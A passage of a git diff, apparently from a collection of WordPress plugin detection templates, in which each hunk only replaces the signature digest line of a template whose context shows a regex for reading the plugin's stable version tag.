490a0046304402203ef3c2eee7df4ccbb6475858a7e606f3fa165afda50f4b11925f66aaf985e97802202d748ebb177656534ac450d695ff1c6dead6f276243c3767c18641cf486a280f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index ccaf554943..bac639d7df 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502205aada77853653074ed220f363d22dfb1677cd376ed20c507c483b84a5a4c047e022100c66fb3db10802f905b0135ef8d8d60e44762f6ea9e3020ea81fa0e65dbb22292:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022041faf1de71e48d18b540dbda750b809f6167a6d6190d7b6508f591c5d6f36f2f022030ad996d0160f04724a74602b337c8607c58aaa1638d89a5b5d6c2339a1182d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index ebf4f493e0..67f3645b48 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100dff1d60a9bce5c0db4daee452ae3c19df058587326cc46ae20b140a7744fe76a022068c2e19dbde9beadd82d9872bf23dbc79b3664fd771f387813d183482e49ea14:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200cabfbf8e977b1d1840d706300163a1c923bcfccaa89ed95e52cb849136f8afc022024d64c3bae9e11421fcbef3331565b368588fd8259f218caab0b0c270b9e484d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index 62c4d34c27..8b2c7e6f6a 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502204df5c27c45f936a31730ecd5dd0d56e6728549e7c42f6417dcef7df834813dd8022100ff7febd4b441e658555f24695f3375b9a68e577be3491424cf881c2dd5d4298c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201f9b9f18004f0b61087af200764171bcad75f5db1028d340af7391706ff45de6022100fdad8fd3111dbcbc142005b139da3e2fb26827aa3e166986b0f6672f57adf165:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 2e3bbc34b8..e42d0e669f 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402207edc3feaebdc9c612318e3bf3f99f46446cb5ffb6c2cbb6ce47ffdd57d731ebc0220243ad26dd5c7efb8ae7fa50074e65d5e3528f04caa37d901414058fefdae7200:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a9ee07ab06bae4d77bd40e9ac10438601aa055e67a2c9f5d665720ddbaebbd7802200dc6937b958e9082f1c66711849b356a7857af8594ae4f107a8110cae12c7469:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index 702c2d0fca..9efa7d857f 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100c3ac4145c010c94f838be4110710d710fabee31c429d8ae30701db0bc51c08d0022100925628e8d8dd7a4d0751ad38967f0d9e159915ca9ff28c8ff47d402fb57d4c4f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fdd2ef9265e93f6a28bdac58544894435a2a39c8705b2167af7dec08dfc9d790022100849843eea5d289a230c98fc235da386cb5a62328bdcf5f4497d49b110178d25c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index c8a6cfeb8c..981dfa79aa 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100d1ba8b25ff958f5062d8d472b1baca56354b9c837b9d8990de48f3e00eaba1f3022100e6ec5261fd3415791aafd4cd3279f16e9cd2cf88e22de8e6719fb2c622f811f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220228b2a457b8777059adc2fae06d13862ab6012ef1452668fc679f2d918400f3d0221008cc4f3c772d5d9b05524dbb3b31a57fcc0bedd03ef5a4e297df37f11aa7e979c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 3f93b9bae8..c2738288a2 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a004830460221008e383aecead4572f554d064ffd37e4982d0322ee08b43e83f83546f587a54912022100b645b9b272a30b3a98c89259ab572cc937a3a9b92b52e5a08be30a08121d57b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022018869ba013cac29cd76d47a2ea3c7e1b5ddb24dad6d23d2a556f287100159180022100ebc12134297869b30ce6c006bb63e4f175acec8aa675d03ad9b2aeb71e1734fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index e08fda36b2..ead5ada524 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402203866407396a521614a1a8635834868477b9e6bc2195da290ba06c671580f9d9c02200832405a2cbcbea0f721fe6533d9f2953630b1a5cec21bf967036f497f128d9b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ef53b0fbfaa8275e397d0d929f8c1758e7b6f1c85fef3794a7ade8d303b225820220079e3842b8a5085e19459f251a0333f7eda65d4f29f0e2a3eea82809e934e82c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index da0c8504eb..d758650fd9 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100c2771a8b46151758927c570009f75eb37d7d7c927c828792ee5788609cc81428022100fce18061bc29bd092d34eafae98dabba937b805532ce0358ac43754367c258a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c75859e6d2ce07565d789b3f62bdf037b34123629fe1af28aa3788532b9deca3022017028fb9383e8d8cd2283d4e2215bac66db75f1393b940f126f05218980c1ff2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index f46a70450e..6297c82f7e 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100bed9bb5e9d1baa3e147264fe587ec37ad688dd6341e322fb75b445f9c34c2b0702203080cc1f2d41a15738ddee4918cd3d09cb277b992906272f2b1814dee0f5e3ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c745b03ba1190d67a6b218de8ca928bdf54648dc81ee4b49a9c044664659bdf202210098b9d15d32dedffdfc39cde02691c5c58ad5015cd93e376161f33b17ff22501c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index 3245031f06..075ace52a9 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402206f9414901f35d97e38dbb96e4970987dc240af1f4f88d1c04b8f4cc3f4b2e134022059eff4be7bdcd40e81863253df5378bb59801c7fef6117dd2a5ea1e6136c10ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202753b06023f1be7ecc2ce5d5f5f12bbdd40f90e7b762a733c572017ab88ea4f8022075b1aa7566b5b8ec87f1ef4731c689c1b9325c9dfe488b48479ffef77210be71:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index 9347868fd7..36469b6ff3 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502210082e8ab43c3e762070954e9d240ee70e1d30b81fe3d82a5c1537a5a8b0f71c443022013a9d7c4b10ec51161b4fbcd59cd6bbc5d3ac78cb7acabecfe3c8de0f0b855aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022054c30ae704fc0c5888e2ef45ec935cd5ba5adc1fd149502f843f0e3806865dbe022100fc88fa2b7a7d5415e4d1d91aef5b7bac7eca97259fdfd33a97c4b1d1f7256b22:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index eb9183d4c0..e92d4d8f83 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402204b7ed8f896ca2f0843e5a4225a38de3e117a132fdb4a3bf08f900f3f579f4c1d02205120e96949aa7d297ab988ffed0eee61a0ac4092fdef039f06137a9f795af44f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b1173fd26c2fa31626c4b345dc889ee9053221b42bd8eed330a5ab45f306553c022100d71a1ed6291ef4d1bc555e69cabbd0d47abcef209e083367608a68300ed47370:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 6694a3b44f..9cefe94b61 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100d0e6f4d60137a523b65f4dc1842edee88d9f0fa4974bd11ffb8ad02b29490b1f022032cc1a7d21300acc847a076671555629eb725edbac5495bc836fff659b70e378:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009130d8395aab24212baaabc1bd263c002f5eb18d9f983d55e09718bc73a4e49702201c874b2509141eef84a96f81d4e63d48ac93eb8dbb1ed5308880d5466cf2579a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index 17e8bd9b38..19c957542c 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502202489c28ebb9f2bb22809ad06b456ad7f90a673806465a72d0a63b6f9d1692dd1022100d3cfe3a8cf2ef24c13d270885408f23170fa0a600aeb50f1c83087389f5e0c38:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100cba5843debd607cc8adcda08556a27ada5be62cef250a06a6b286b4af38e3255022100cbeed8108335cf75f41b63227cb3a604d5d037d290b1607adfbd35e6de81b085:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 4067a735f5..5860acd155 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a00463044022019313b879dd686581ea95de5819e10fe98f003385ba6249ba29513ddb8c21160022076a91581ae93e17885be49c016afc88f6a4a381b7afe4275ad789aefa8eaba75:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100be28930f61b634e9c6133a43cfabfbed582108e237e6a17458f778c444e2fbda022039401231c22b99ec1321614f87d4e4a9572ab03aa2bc6071293f5988026e4b59:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index 5a43f9214f..3c759e5add 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502202e591f388fdcf07c9f9a4a8d6e9fade7015911da0ccf077725d1662debf8ca06022100e8b62cce86db8b6d8d0149501731ca47a398e0789868118956a65511b408d721:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201fe1f08adb9de7eada0175178e5b42ed39b24e2812afd9b9b60596e4865f92d2022013482e6e5c61572d3b9e5f5c8fefc764f32570faadd7ef73e2b8d9e44b5b0520:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hostinger.yaml b/http/technologies/wordpress/plugins/hostinger.yaml index 6fcba19db2..f87986fa4f 100644 --- a/http/technologies/wordpress/plugins/hostinger.yaml +++ b/http/technologies/wordpress/plugins/hostinger.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502205c029bc5da637bf939f84cbac1f0c68820a85f9a8760930267ca4cb376618a93022100fdca8959b76c84a6853d338b97574321fd4124dbb6a0ff12ab9e263447978646:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f3bf16bab7cc6486bca1fa963c0aa349894a9e1e7d293d14ad6c063446e9a7d4022100a9fa040c6769898d6de1c1cd30230ad9b4814e71ed9ad44b9a8aaff29ab88edf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/image-optimization.yaml b/http/technologies/wordpress/plugins/image-optimization.yaml index ec2a1b16d6..0fb369d947 100644 --- a/http/technologies/wordpress/plugins/image-optimization.yaml +++ b/http/technologies/wordpress/plugins/image-optimization.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a004630440220405326015848c92775979de58ac8885938664f76512e95ca017616d76788048802204c618435277ccd63e00f595a3249fa639d08cab36e3e5d776d3f78f776409876:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c2a9cf0fb2694cd946e9027edf0415e5f64f5cf945fa86c443b91fb7ff63409d022100edf3453bda82386dc30acb4c03a483604cae16373307d9ec52550dbdda70d85a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 959bb671ac..6270a4f5a5 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a004730450220605900d015ce7bffdda33e2112b000ddb4c71ce20a4f35b22fb2353f0ee5d3e9022100e975c0e3b927a1e64865d5ee80f5b0a6bbd6ada0be3e8493a936d6542ae35f98:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a6fadcebb1553aa86edbc46b587bd6e5bfa33dc2a9997ec652e1ce787dbfb566022100c7969b5b5cce74ee2c47c05b948ba89a5386610f831aecbac91fea4e73b17d89:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index 13caa6efe4..508d325436 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100c312551e1707effe50790b46ae9b362da8ddc07e2d4cfb358590ca151482b5ac0221008ec881493d55b60d1df0a7d92fb773bfb0996d3af5099be29b259d4b80fa3e33:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100cb142aeb1ff33a9489feaf321ecd3244509c4aaaf0a5d89e0d7b2e44f070ae46022100ef912054593822b054a69859341249a560a11b3e432952c237ce7d1cdf83dd74:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index aaee59c828..8d55c87b25 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022076ba2e47242c6918e3a677efa0c3dfe3a898a31dab72036a01d91cb018f4d143022100dc978201ebe3ce6ecaccc8f5d94ec50eb1660a4559b49d3b86459af7364fdfb0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022000befb6ac214e56a6024cee4d54936c18300417bd30aeecab8e3b5542f6e492002201e5086e7f3595d1dd6428517817542c2e876b2f7e030bb6b254f02a57ff4ce3b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 5774cb23bb..a250dac31e 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502207e492862598685f6c8ed897fb147871331166a6152d42dade35c104ebfb99fd4022100c96f0198cbaff8f6546cb6fb444e58dda3010217d55775cc699b3934e98e823c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009a9c7b62e87eb7d8e64a8796d028b3bc6cd7ba6c5162a1ae0d449d152a3991890220282f2e01c6d9241677da27cfcc4c18b8efe775820e40870e815283c7819b57b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index 84fb779f38..5bbf7b3870 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100aaa24d085c59aa65e79027b4b6c8cf07cb4a323031a7b3a7c1433a69b569c2d002200288a2a8f5aae0db5f9581508870a5dca8d3bd6b582d1c9b29eaa58c5dccdcd6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022059600ebaa0c6d5d25bc76a1409cd420d15aed1bc432e76b94e85bcf9c619b6460220397eba9bcd8c4cb4862c856197a069ecbcff6aff7beb99831a4942d676c649aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index 1f05b4d72b..e840c34202 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a004630440220253b02b1337a1ad1cf41fbd61368d84ff484f224f831eb999eae47894d55552d02200f9b78a36de22e18f97cf822602dc9b9dc2d504e7808eadcd58c08f73822dad0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220070441586de3af026cb899d397f6bfd6086f979abb6f300747497f8f2f0cc9230220045298955ea8a82d6a5038b0764ec7d01a8103d6d314c41c1df2a99b8fd89694:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index 85a7e9c5b8..31f651d1ec 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100991f2fb88c6447356db10a265bf74a7d1c28ded5fa0a7fdcdb46616706bcc024022100bafe04aae963f829af40de75c69b77b55af9474d4d86d10deeb5c278c0555cf3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220076f4873cc3a28cae0c3fc7f5ff49d3b1345c440bac2c22ad619e675e824eaa6022100f343b78ee31339a12cbd2740d056a48395786e80334c8bb1d62dede8ad43c024:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 442f402937..15ba746de9 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100b2b66561f6973f00d1fcc9e3586b608f253ebaf58799244fd2c50601437fef5f022100f2f3f6a1535d5b37811045b3b77a36aa02aca193f808dacf619f0573833818d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f1550cbba9a35e54b605f3dcec2422afb135ba03bb513250859f19dd8f56d972022034ff2a26d196feb774eb098b2a4ee48c48d7f9982d6aa91db389648f29d5901d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index 9446bfa6c0..880635b959 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a00463044022031e42dd3cf51abbc0349a38b290b077d42930284b44c613ef17a50f5c7fb4d8702203d27e575783b563e20346ba0bdfa870b68289b8fd6c5db5a243d0c238eb0dcca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022026f1c8771a54a84a24c7805f1133ec6e087326c400506774810ee083e913bf860220188eae8b9559e1369911a50bbe5f4a4613f3f00362015b51e59bec383e42b82d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index eb5e82b611..ef31aa71cb 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100e4ac169977f28133750c841c8985eebce39e0b5b42ad16a312f8954fe651814c022100bf34f7787ca2c8fa4a73e5623f18b57e7435f252563249cfb9dab4c63ab7cd0f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022035865cb808a25725a2c51aed1f04f668207c84e277491a2374ba69ae361823a8022038d017ad0e5a4db035243a624fd7551af152438aa9952ddaf02bfc84907a3ed6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index e6bda1632e..7b93dd78a2 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a004730450220169417a20c5ab1571216f36c949ddd13faa59eb9cb9a083492bf67db457a24af022100c04cea528c0111b2f9e109cd421890ba533fe5d74a1aa01107ac6b5e202af6ed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100cdac166725f40d59bdb6c77c25373b0e32a1aa95027c6d638ace452a95a0a88c022100c930004e5692742acd4b8817076658c2dced4e93ec38db15e54aeb0f31a1ca80:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index d5d269886b..f73ed9e833 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100f08a483bdb4ac75abd30cea65cd3a27f7159b616a1cad15e534ffa63705aff9202202df80eb8a6d5312279f59c216d7ac5f8ca60bfb7f565c5304f84307560aa3fe5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220206d2a6702633fc0ec4b0ddc213fe1bd5515b8693f9df89ca5f772ddd6d8195a0220126d0be37b1422b9da4a722dcfd56e5a011de860f3029d1c1cc4d66b7d616d2f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index 3aba904108..b0f70a36e9 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100a23dab34e2b412c78159caeb0df791de7e958772a459a95013c08a4b9eb4840c022023527a3b44a7702cf303194b4a97401d9fc66404240526f9c6dedf228534c7b4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200ff5f167fb0c7e24a52f6e4c51399179f427c18bcc421f2d03cef471a9c86cf6022100c0a17c9e18f0bb798727dec0bd5bd5ac95727b334a8b9f6f3fa78016647b08f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index 315b960a0e..8c1b9e3dc1 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100cf619517d2764b4b13c32b5828d293a815094016f1e72d39ca40bcca08982ceb022100a6d1fa5c1d89d7118adeafdc9ce83b1cfb79a21248d142e05946e963a45dce46:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022054418e7b21f9b273a887f6a641393bb10e51daa678bcf806bdab6e71388507390220432219b10318cf76bc889e2af3bb29415b87204f3a2f422d2ce8388a6ffb4c9b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index 2b63c7e90f..832e45c7cf 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml 